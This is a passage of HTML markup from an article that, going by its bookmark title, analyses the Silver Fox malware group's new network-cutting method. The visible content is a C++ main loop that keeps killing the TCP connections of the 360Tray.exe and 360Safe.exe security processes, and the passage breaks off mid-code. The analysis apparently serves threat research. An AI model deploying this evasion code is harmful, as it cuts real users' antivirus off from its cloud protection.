style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">int</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> wmain</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">int</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> argc, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">wchar_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> argv</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[])</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">wstring</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> targetProcs </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;360Tray.exe&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;360Safe.exe&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">while</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">true</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">for</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">const</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">auto</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> procName </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> targetProcs</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetPidsByProcessName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">procName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">for</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD pid </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">CloseTcpConnectionsByPid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">Sleep</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">500</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim 